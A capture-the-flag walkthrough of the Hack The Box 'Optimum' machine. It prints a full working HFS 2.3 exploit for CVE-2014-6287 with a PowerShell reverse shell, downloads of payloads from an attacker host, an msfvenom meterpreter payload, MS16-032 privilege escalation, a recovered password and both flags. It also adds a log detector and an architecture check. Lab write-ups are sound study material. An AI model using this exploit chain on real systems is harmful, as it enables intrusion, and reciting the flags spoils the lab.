HTB:Optimum[WriteUP]
Contents
Connect to the HTB server and start the target machine
1.Which version of HttpFileServer is running on TCP port 80?
Use nmap to run script and service-version scans against port 80 of the target
Port 80 of the target can be accessed directly with a browser
2.What is the 2014 CVE ID for a remote code execution vulnerability in the findMacroMarker function in HttpFileServer 2.3 version?
3.What user is the webserver running as? Provide the username without the domain.
4.Submit the flag located on the kostas user's desktop.
USER_FLAG:1d5409044d142fe837a56b407fe50973
5.Optional question: What is the password for the kostas user?
6.Which metasploit reconnaissance module can be used to list possible privilege escalation paths on a compromised system?
7.Submit the flag located on the administrator's desktop.
ROOT_FLAG:937d8012afc7f718e2fd49a85d113f16
Connect to the HTB server and start the target machine
Target IP: 10.10.10.8
Assigned IP: 10.10.16.8
1.Which version of HttpFileServer is running on TCP port 80?
Use nmap to run a full-port scan of the target
nmap -p- --min-rate=1500 -sS -T4 -Pn 10.10.10.8
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- --min-rate=1500 -sS -T4 -Pn 10.10.10.8
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-20 23:34 EDT
Nmap scan report for 10.10.10.8
Host is up (0.089s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 86.43 seconds
From the scan results, the target has a single open port: 80
Use nmap to run script and service-version scans against port 80 of the target
nmap -p 80 -sCV 10.10.10.8
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p 80 -sCV 10.10.10.8
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-20 23:37 EDT
Nmap scan report for 10.10.10.8
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.90 seconds
From the scan results, the service version shown in the VERSION column is 2.3
Port 80 of the target can be accessed directly with a browser
2.What is the 2014 CVE ID for a remote code execution vulnerability in the findMacroMarker function in HttpFileServer 2.3 version?
Use searchsploit to search for vulnerabilities in this service and version
Copy the exploit script to the current directory
searchsploit -m windows/remote/49584.py
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m windows/remote/49584.py
Exploit: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
URL: https://www.exploit-db.com/exploits/49584
Path: /usr/share/exploitdb/exploits/windows/remote/49584.py
Codes: N/A
Verified: False
File Type: ASCII text, with very long lines (546)
Copied to: /home/kali/Desktop/temp/49584.py
Use the strings command to view the contents of the exploit
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# strings 49584.py
# Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 20/02/2021
# Exploit Author: Pergyz
# Vendor Homepage: http://www.rejetto.com/hfs/
# Software Link: https://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Microsoft Windows Server 2012 R2 Standard
# CVE : CVE-2014-6287
# Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands
#!/usr/bin/python3
import base64
import os
import urllib.request
import urllib.parse
lhost = "10.10.10.1"
lport = 1111
rhost = "10.10.10.8"
rport = 80
# Define the command to be written to a file
command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{{0}}; while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){{; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (Invoke-Expression $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (Get-Location).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}}; $client.Close()'
# Encode the command in base64 format
encoded_command = base64.b64encode(command.encode("utf-16le")).decode()
print("\nEncoded the command in base64 format...")
# Define the payload to be included in the URL
payload = f'exec|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand {encoded_command}'
# Encode the payload and send a HTTP GET request
encoded_payload = urllib.parse.quote_plus(payload)
url = f'http://{rhost}:{rport}/?search=%00{{.{encoded_payload}.}}'
urllib.request.urlopen(url)
print("\nEncoded the payload and sent a HTTP GET request to the target...")
# Print some information
print("\nPrinting some information for debugging...")
print("lhost: ", lhost)
print("lport: ", lport)
print("rhost: ", rhost)
print("rport: ", rport)
print("payload: ", payload)
# Listen for connections
print("\nListening for connection...")
os.system(f'nc -nlvp {lport}')
From the header comments, this exploit was written for CVE-2014-6287
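For the defender's side of the same bug, here is an added example (not part of the original writeup) that scans constructed web-server access-log lines for the request shape the exploit above sends: a null byte (%00) followed by an HFS `{.macro.}` marker in a query parameter. The log lines, IPs and the `search` parameter name are constructed for the demo.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Constructed sample access-log lines (not from the target); the first mimics
# the request shape of the exploit above, the other two are benign or noise.
SAMPLE_LOG = """\
10.10.16.8 - - [21/Oct/2024:00:10:01 -0400] "GET /?search=%00%7B.exec%7Cpowershell.exe+-EncodedCommand+AAAA.%7D HTTP/1.1" 200 -
10.10.14.3 - - [21/Oct/2024:00:10:05 -0400] "GET /?search=report.pdf HTTP/1.1" 200 1234
10.10.14.3 - - [21/Oct/2024:00:10:09 -0400] "GET /?search=%7B.cmd.%7D HTTP/1.1" 200 -
"""

# Request line inside a combined-format log entry.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# HFS macro marker "{." followed by the macro name, matched on decoded bytes.
MACRO_RE = re.compile(rb"\{\.(?P<name>[A-Za-z_]+)")


def analyse_target(target):
    """Return a finding for the first query parameter carrying HFS macro
    syntax, or None. Decoding to bytes rather than str keeps an embedded
    %00 visible: null byte + macro marker is the findMacroMarker bypass."""
    for param in urlsplit(target).query.split("&"):
        name, _, value = param.partition("=")
        raw = unquote_to_bytes(value)
        m = MACRO_RE.search(raw)
        if m is None:
            continue
        null_byte = b"\x00" in raw
        return {
            "param": name,
            "macro": m.group("name").decode("ascii"),
            "null_byte": null_byte,
            "severity": "high" if null_byte else "medium",
        }
    return None


def scan_log(text):
    """Return one finding per log line whose request carries HFS macro syntax."""
    findings = []
    for line in text.splitlines():
        m = REQ_RE.search(line)
        if m is None:
            continue
        finding = analyse_target(m.group("target"))
        if finding is not None:
            finding["src"] = line.split(" ", 1)[0]  # client address
            findings.append(finding)
    return findings
```

Plain macro syntax without the null byte is flagged at medium severity because it may be a false positive from filenames, while the null-byte form has no legitimate use in a search string.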
3.What user is the webserver running as? Provide the username without the domain.
In this exploit, the variables we need to modify are lhost, lport, rhost and rport
After editing and saving, run the script with python
python3 49584.py
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# python 49584.py
Encoded the command in base64 format...
Encoded the payload and sent a HTTP GET request to the target...
Printing some information for debugging...
lhost: 10.10.16.8
lport: 1425
rhost: 10.10.10.8
rport: 80
payload: exec|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand [base64-encoded command omitted]
Listening for connection...
listening on [any] 1425 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.8] 49158
whoami
optimum\kostas
From the output of the whoami command, the web server runs as the kostas user; optimum is the domain
4.Submit the flag located on the kostas user's desktop.
user_flag can be found directly in the directory the connection lands in
PS C:\Users\kostas\Desktop> ls
Directory: C:\Users\kostas\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 18/3/2017 2:11 ?? 760320 hfs.exe
-ar-- 27/10/2024 2:10 ?? 34 user.txt
PS C:\Users\kostas\Desktop> type user.txt
1d5409044d142fe837a56b407fe50973
USER_FLAG:1d5409044d142fe837a56b407fe50973
5.Optional question: What is the password for the kostas user?
Start an HTTP server with python on the attacking machine and upload winPEAS.exe to the target
┌──(root㉿kali)-[/home/kali/Desktop/tool]
└─# ls
fscan impacket keepass-password-dumper lxd-alpine-builder nc.exe rogue-jndi
fscan.exe JSFinder.py linpeas.sh mimikatz.exe Responder winPEAS.exe
┌──(root㉿kali)-[/home/kali/Desktop/tool]
└─# python -m http.server 7777
Serving HTTP on 0.0.0.0 port 7777 (http://0.0.0.0:7777/) ...
10.10.10.8 - - [21/Oct/2024 00:17:25] "GET /winPEAS.exe HTTP/1.1" 200 -
On the target, download it with powershell
powershell.exe -Command "Invoke-WebRequest -Uri http://10.10.16.8:7777/winPEAS.exe -OutFile winPEAS.exe"
PS C:\Users\kostas\Desktop> ls
Directory: C:\Users\kostas\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 18/3/2017 2:11 ?? 760320 hfs.exe
-ar-- 27/10/2024 2:10 ?? 34 user.txt
PS C:\Users\kostas\Desktop> powershell.exe -Command "Invoke-WebRequest -Uri http://10.10.16.8:7777/winPEAS.exe -OutFile winPEAS.exe"
PS C:\Users\kostas\Desktop> ls
Directory: C:\Users\kostas\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 18/3/2017 2:11 ?? 760320 hfs.exe
-ar-- 27/10/2024 2:10 ?? 34 user.txt
-a--- 27/10/2024 3:03 ?? 2424320 winPEAS.exe
Run winPEAS directly
./winPEAS.exe
kostas's credentials can be found in the output; if you don't want to read through it line by line, press Ctrl+Shift+F and search for password
Username: kostas
Password: kdeEjDowkS*
6.Which metasploit reconnaissance module can be used to list possible privilege escalation paths on a compromised system?
Following the hint in the question, start msfconsole and search: post/multi/recon
It can be determined that the module needed is local_exploit_suggester
use post/multi/recon/local_exploit_suggester
List the options this module requires
show options
We can see that we first need an existing SESSION
7.Submit the flag located on the administrator's desktop.
View the target's system information
systeminfo
PS C:\Users\kostas\Desktop> systeminfo
Host Name: OPTIMUM
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-70000-00000-AA535
Original Install Date: 18/3/2017, 1:51:36 ??
System Boot Time: 27/10/2024, 2:08:35 ??
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
The target is an x64 Windows Server 2012 R2 system
Generate a 64-bit payload directly with msfvenom (this is critical; otherwise it breaks the privilege escalation later)
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.8 LPORT=8686 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Download shell.exe on the target
PS C:\Users\kostas\Desktop> powershell.exe -Command "Invoke-WebRequest -Uri http://10.10.16.8:7777/shell.exe -OutFile shell.exe"
PS C:\Users\kostas\Desktop> ls
Directory: C:\Users\kostas\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 18/3/2017 2:11 ?? 760320 hfs.exe
-a--- 27/10/2024 3:28 ?? 73802 rs.exe
-a--- 27/10/2024 4:16 ?? 7168 shell.exe
-ar-- 27/10/2024 2:10 ?? 34 user.txt
-a--- 27/10/2024 3:03 ?? 2424320 winPEAS.exe
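As an added example (not code from the writeup or from Metasploit), a Python check for the architecture pitfall noted above: it reads the Machine field of a PE header and compares it with the architecture reported in the 'System Type' line of systeminfo output, so a 32-bit binary on an x64 host is caught before it is run. The systeminfo excerpt is constructed in the format shown above, and make_stub only builds constructed headers for offline testing.

```python
import struct

# IMAGE_FILE_HEADER.Machine values from the PE specification.
MACHINE_NAMES = {0x014C: "x86", 0x8664: "x64", 0x01C4: "arm", 0xAA64: "arm64"}

# Constructed excerpt in the format of the systeminfo output shown above.
SYSTEMINFO_EXCERPT = """\
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
"""


def pe_machine(data: bytes) -> str:
    """Read the Machine field of a PE file: "MZ" at 0, e_lfanew (u32) at 0x3C,
    "PE\\0\\0" at e_lfanew, then IMAGE_FILE_HEADER whose first u16 is Machine."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    return MACHINE_NAMES.get(machine, f"unknown(0x{machine:04x})")


def host_arch_from_systeminfo(text: str) -> str:
    """Map the 'System Type' line of systeminfo output to x64 / x86."""
    for line in text.splitlines():
        if line.startswith("System Type:"):
            value = line.split(":", 1)[1].strip().lower()
            if value.startswith("x64"):
                return "x64"
            if value.startswith("x86"):
                return "x86"
            return value
    raise ValueError("System Type line not found")


def binary_matches_host(pe_data: bytes, systeminfo_text: str) -> bool:
    """True when the binary's architecture equals the host's; a mismatch is the
    pitfall the writeup warns about before the local privilege-escalation step."""
    return pe_machine(pe_data) == host_arch_from_systeminfo(systeminfo_text)


def make_stub(machine: int) -> bytes:
    """Constructed minimal MZ/PE header (headers only, not a runnable program)
    so the checks above can be exercised offline."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header follows DOS header
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 0, 0)  # IMAGE_FILE_HEADER
    return bytes(dos) + b"PE\0\0" + coff
```

The same check is useful in triage: the Machine field of a binary recovered from a host tells you which process architecture it was built to run in.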
Switch to the payload handler module
use exploit/multi/handler
Set the parameters: LHOST, LPORT, PAYLOAD
msf6 exploit(multi/handler) > set LHOST 10.10.16.8
LHOST => 10.10.16.8
msf6 exploit(multi/handler) > set LPORT 8686
LPORT => 8686
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
Start listening
msf6 exploit(multi/handler) > exploit
After running shell.exe on the target, MSF receives the callback
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.16.8:8888
[*] Sending stage (176198 bytes) to 10.10.10.8
[*] Meterpreter session 4 opened (10.10.16.8:8888 -> 10.10.10.8:49168) at 2024-10-21 00:52:33 -0400
meterpreter > getuid
Server username: OPTIMUM\kostas
Background the Meterpreter into a session
meterpreter > background
[*] Backgrounding session 7...
Switch to the privilege-escalation helper module
use post/multi/recon/local_exploit_suggester
Because the session id shown after running background was 7, I set SESSION to 7 here
set SESSION 7
Type run or exploit to start the scan
From the modules shown in green, we pick the privilege-escalation modules that support x64 2012 R2 and try them
After repeated testing, only windows/local/ms16_032_secondary_logon_handle_privesc escalates privileges successfully
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
List all the options this module accepts
List the available targets
show targets
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > show targets
Exploit targets:
================
Id Name
-- ----
=> 0 Windows x86
1 Windows x64
Select the 64-bit system as the target
set TARGET 1
After filling in the other required parameters, run the module with exploit or run
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST 10.10.16.8
LHOST => 10.10.16.8
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LPORT 333
LPORT => 333
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 7
SESSION => 7
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > exploit
Switch to a cmd shell
meterpreter > shell
meterpreter > shell
Process 2780 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
Go to the root of the C: drive
cd C:\
Find the location of root_flag
dir /s root.txt
C:\>dir /s root.txt
dir /s root.txt
Volume in drive C has no label.
Volume Serial Number is EE82-226D
Directory of C:\Users\Administrator\Desktop
27/10/2024 02:10 34 root.txt
1 File(s) 34 bytes
Total Files Listed:
1 File(s) 34 bytes
0 Dir(s) 5.672.394.752 bytes free
View the contents of root_flag
type C:\Users\Administrator\Desktop\root.txt
C:\>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
937d8012afc7f718e2fd49a85d113f16